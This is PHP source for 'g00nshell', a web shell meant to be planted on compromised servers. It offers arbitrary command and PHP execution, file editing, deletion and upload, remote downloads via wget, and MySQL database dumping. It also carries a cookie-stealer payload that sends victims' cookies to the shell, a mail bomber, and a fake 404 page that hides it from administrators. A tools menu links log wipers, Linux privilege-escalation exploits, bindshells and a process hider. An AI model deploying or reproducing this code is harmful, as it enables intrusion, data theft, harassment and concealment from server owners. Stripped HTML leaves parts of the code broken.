document.location.href= # #'http://site.com/shl.php?cookie='+document.cookies # ##########################VERIFICATION LEVELS######################### #0: No protection; anyone can access # #1: User-Agent required # #2: Require IP # #3: Basic Authentication # ##############################KNOWN BUGS############################## #Windows directory handling # # # #The SQL tool is NOT complete. There is currently no editing function# #available. Some time in the future this may be fixed, but for now # #don't complain to me about it # ################################SHOUTS################################ #pr0be - Beta testing & CSS # #TrinTiTTY - Beta testing # #clorox - Beta testing # #Everyone else at g00ns.net # ########################NOTE TO ADMINISTRATORS######################## #If this script has been found on your server without your approval, # #it would probably be wise to delete it and check your logs. # ###################################################################### */ error_reporting(0); // Configuration $auth = 0; $uakey = "724ea055b975621b9d679f7077257bd9"; // MD5 encoded user-agent $IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell $email = ""; // E-mail address where cookies will be sent $user = "55c4b3899b00d20543d41170d2775e8f"; // MD5 encoded User $pass = "8634361d1a2e44420f44ef3612706bb5"; // MD5 encoded Password // Global Variables $version = "1.3 final"; $self = $_SERVER['PHP_SELF']; $soft = $_SERVER["SERVER_SOFTWARE"]; $servinf = split("[:]", getenv('HTTP_HOST')); $servip = $servinf[0]; $servport = $servinf[1]; $uname = php_uname(); $curuser = @exec('whoami'); $cmd = $_GET['cmd']; $act = $_GET['act']; $cmd = $_GET['cmd']; $cookie = $_GET['cookie']; $f = $_GET['f']; $curdir = cleandir(getcwd()); if(!$dir){$dir = $_GET['dir'];} elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];} elseif($dir && $_SESSION['dir']){$dir = $curdir;} if($dir && $dir != "nullz"){$dir = cleandir($dir);} $contents = $_POST['contents']; $gf = $_POST['gf']; $img = $_GET['img']; session_start(); @set_time_limit(5); switch($auth){ // Authentication switcher case 0: break; case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();} break; case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break; case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break; } function userauth(){ // Basic authentication function global $user, $pass; header("WWW-Authenticate: Basic realm='Secure Area'"); if(md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)){ hide(); die(); } } if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();} elseif(!$act && $cmd){ style(); echo("Results:\n
"); } elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email"); hide();} // Cookie stealer function elseif($act == "view" && $f && $dir){view($f, $dir);} elseif($img){img($img);} elseif($gf){grab($gf);} elseif($dir){files($dir);} else{ switch($act){ case "phpinfo": phpinfo();break; case "sql": sql();break; case "files": files($dir);break; case "email": email();break; case "cmd": cmd();break; case "upload": upload();break; case "tools": tools();break; case "sqllogin": sqllogin();break; case "sql": sql();break; case "lookup": lookup();break; case "kill": kill();break; case "phpexec": execphp();break; default: main();break; } } function cleandir($d){ // Function to clean up the $dir and $curdir variables $d = realpath($d); $d = str_replace("\\\\", "//", $d); $d = str_replace("////", "//", $d); $d = str_replace("\\", "/", $d); return($d); } function hide(){ // Hiding function global $self, $soft, $servip, $servport; die(" 404 Not Found

Not Found

The requested URL $self was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


$soft Server at $servip Port $servport
"); } function style(){ // Style / header function global $servip,$version; echo("\n \n g00nshell v" . $version . " - " . $servip . "\n \n \n"); } function main(){ // Main/menu function global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version; style(); $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute', 'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell'); $capt = array_flip($act); echo("
"); echo("Host: " . $servip . "
"); echo("Server software: " . $soft . "
"); echo("Uname: " . $uname . "
"); echo("Shell Directory: " . getcwd() . "
"); echo(""); echo("[ More ] "); echo("[ Less ]"); echo("
"); echo("

Links

"); if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ " . $link . " ] ");}} else{foreach($act as $link){echo("[ " . $link . " ] ");}} echo("
"); echo("
"); echo("
"); echo("
:: g00nshell v" . $version . " ::
"); die(); } function cmd(){ // Command execution function style(); echo(""); echo("Command:
"); echo(" "); echo("
\n"); echo("\n"); echo("
\n"); if($_POST['cmd'] != ""){$x = $_POST['cmd'];} elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];} else{die();} echo("Results:
"); } function execphp(){ // PHP code execution function style(); echo("

Execute PHP Code

"); echo("
"); echo("\n
\n"); echo(""); echo("
"); if($_POST['phpexec']){ echo(""); } } function sqllogin(){ // MySQL login function session_start(); if($_SESSION['isloggedin'] == "true"){ header("Location: ?act=sql"); } style(); echo("
"); echo("User:

\n"); echo("Password:

\n"); echo("Host:

\n"); echo("Port:

\n"); echo(""); echo("
"); die(); } function sql(){ // General SQL Function session_start(); if(!$_GET['sqlf']){style();} if($_POST['un'] && $_POST['pw']){; $_SESSION['sql_user'] = $_POST['un']; $_SESSION['sql_password'] = $_POST['pw']; } if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];} else{$_SESSION['sql_host'] = 'localhost';} if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];} else{$_SESSION['sql_port'] = '3306';} if($_SESSION['sql_user'] && $_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); echo("Invalid credentials
\n"); die(sqllogin()); } else{ $_SESSION['isloggedin'] = "true"; } } else{ die(sqllogin()); } if ($_GET['db']){ mysql_select_db($_GET['db'], $sqlcon); if($_GET['sqlquery']){ $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error()); $num = mysql_num_rows($dat); for($i=0;$i<$num;$i++){ echo(mysql_result($dat, $i) . "
\n"); } } else if($_GET['table'] && !$_GET['sqlf']){ echo("Insert Row

\n"); echo(""); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo(""); for($i=0;$i" . $row[0] . ""); } } echo("\n"); } } $y++; } echo("
" . $fields[$i]); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); $y=0; for($x=1;$x<=$num_rows+1;$x++){ if(!$_GET['p']){ $_GET['p'] = 1; } if($_GET['p']){ if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){ echo("
\n"); for($z=1;$z<=ceil($num_rows / 30);$z++){ echo("" . $z . " | "); } } elseif($_GET['table'] && $_GET['sqlf']){ switch($_GET['sqlf']){ case "dl": sqldownload();break; case "ins": sqlinsert();break; default: $_GET['sqlf'] = ""; } } else{ echo(""); $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)){ echo("\n"); } echo("
" . $row[0] . "[Download]
"); } } else{ $dbs=mysql_list_dbs($sqlcon); while($row = mysql_fetch_object($dbs)) { echo("" . $row->Database . "
\n"); } } mysql_close($sqlcon); } function sqldownload(){ // Download sql file function @ob_flush; $sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']); mysql_select_db($_GET['db'], $sqlcon); $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); $i++; } $result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); for($x=1;$x<$num_rows;$x++){ $out .= "("; for($i=0;$i\nGo back"); } $query = "SHOW COLUMNS FROM " . $_GET['table']; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $i = 0; $fields = array(); echo("
"); echo(""); while($row = mysql_fetch_assoc($result)){ array_push($fields, $row['Field']); echo("
" . $fields[$i] . "
\n"); $i++; } echo("
"); echo("
\n"); echo("
"); } function nicesize($size){ if(!$size){return false;} if ($size >= 1073741824){return(round($size / 1073741824) . " GB");} elseif ($size >= 1048576){return(round($size / 1048576) . " MB");} elseif ($size >= 1024){return(round($size / 1024) . " KB");} else{return($size . " B");} } function files($dir){ // File manipulator function style(); global $self, $curdir; if($dir==""){$dir = $curdir;} $dirx = explode("/", $dir); $files = array(); $folders = array(); echo("
"); echo(""); echo(""); echo("
"); echo("

File list for "); for($i=0;$i$dirx[$i]" . "/"); } echo("

"); echo(""); echo(""); if ($handle = opendir($dir)) { while (false != ($link = readdir($handle))) { if (is_dir($dir . '/' . $link)){ $file = array(); if(is_writable($dir . '/' . $link)){$file['perm']='write';} elseif(is_readable($dir . '/' . $link)){$file['perm']='read';} else{$file['perm']='none';} switch($file['perm']){ case "write": @$file['link'] = "$link"; break; case "read": @$file['link'] = "$link"; break; case "none": @$file['link'] = "$link"; break; default: @$file['link'] = "$link"; break; } @$file['icon'] = "folder"; if($_SERVER['QUERY_STRING']){$folder = " " . $file['link'];} else{$folder = " " . $file['link'];} array_push($folders, $folder); } else{ $file = array(); $ext = strtolower(end(explode(".", $link))); if(!$file['size'] = nicesize(@filesize($dir . '/' . $link))){ $file['size'] = "0B"; } if(is_writable($dir . '/' . $link)){$file['perm']='write';} elseif(is_readable($dir . '/' . $link)){$file['perm']='read';} else{$file['perm']='none';} switch($file['perm']){ case "write": @$file['link'] = "$link"; break; case "read": @$file['link'] = "$link"; break; case "none": @$file['link'] = "$link"; break; default: @$file['link'] = "$link"; break; } switch($ext){ case "exe": case "com": case "jar": case "": $file['icon']="binary"; break; case "jpg": case "gif": case "png": case "bmp": $file['icon']="image"; break; case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file['icon']="compressed"; break; case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file['icon']="text"; break; case "wav": case "mp3": case "mp4": case "wma": $file['icon']="sound"; break; case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file['icon']="script"; break; default: $file['icon'] = "unknown"; break; } if($_SERVER['QUERY_STRING']){$file = "\n";} else{$file = "\n";} array_push($files, $file); } } foreach($folders as $folder){echo("\n");} foreach($files as $file){echo($file);} echo("
File NameFile Size
" . $file['link'] . "" . $file['size'] . "
" . $file['link'] . "" . $file['size'] . "
$folderDIR
"); closedir($handle); } } function email(){ // Email bomber function $times = $_POST['times']; $to = $_POST['to']; $subject = $_POST['subject']; $body = $_POST['body']; $from = $_POST['from']; style(); echo("

Mail Bomber

Your address:

Their address:

Subject:

Text:

How many times:


"); if ($to && $from){for($i=0;$i<$times;$i++){mail("$to", "$subject", "$body", "From: $from");}} } function view($filename, $dir){ // File view function if($_POST['fileact'] == "Download"){ header("Content-type: application/octet-stream"); header("Content-length: ".strlen($_POST['contents'])); header("Content-disposition: attachment; filename=" . basename($filename) . ";"); $handle = fopen($filename, "r"); echo(fread($handle, filesize($filename))); die(); } style(); if($_POST['contents'] && $_POST['fileact'] == "Save"){ $handle = fopen($filename, 'w'); fwrite($handle, stripslashes($_POST['contents'])); fclose($handle); echo("Saved file.

"); echo("Go back"); die(); } elseif($_POST['fileact'] == "Delete"){ unlink($filename); echo("Deleted file.

"); echo("Go back"); die(); } if($dir != "nullz"){ // heh $filename = $dir."/".$filename; } $bad = array("<", ">"); $good = array("<", ">"); $file = fopen($filename, 'r'); $content = fread($file, @filesize($filename)); echo("
"); echo(""); echo(""); echo(""); echo(""); echo("
"); } function edit($file, $contents){ // File edit function style(); $handle = fopen($file, 'w'); fwrite($handle, $contents); fclose($handle); echo("Saved file.

"); echo("Go back"); } function upload(){ // Uploading frontend function global $curdir; style(); echo("
Output Directory


Remote Upload


Local File Upload

"); if($_POST['rem']){grab($_POST['rem']);} if($_FILES['up']){up($_FILES['up']);} } function up($up){ // Uploading backend function style(); $updir = $_POST['loc']; move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]); die("File has been uploaded."); } function grab($file){ // Uploading backend function style(); $updir = $_POST['loc']; $filex = array_pop(explode("/", $file)); if(exec("wget $file -b -O $updir/$filex")){die("File has been uploaded.");} else{die("File upload failed.");} } function tools(){ // Useful tools function global $curdir; style(); $tools = array( "--- Log wipers ---"=>"1", "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz", "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c", "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh", "--- Priv Escalation ---"=>"2", "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit", "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3", "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor", "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd", "--- Bindshells ---"=>"3", "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl", "Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix", "--- Misc ---"=>"4", "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz", "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c"); $names = array_flip($tools); echo("Tools:"); echo("
"); echo("Output Directory
"); echo("

"); echo(""); echo("
"); echo("
"); } function lookup(){ // Domain lookup function style(); global $servinf; $script = "import urllib, urllib2, sys, re req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]})) site = re.findall('.+\) (.+)
', urllib2.urlopen(req).read()) for i in xrange(0,len(site)): print site[i]"; // My ***y python script $handle = fopen('lookup.py', 'w'); fwrite($handle, $script); fclose($handle); echo("

Domains

"); echo("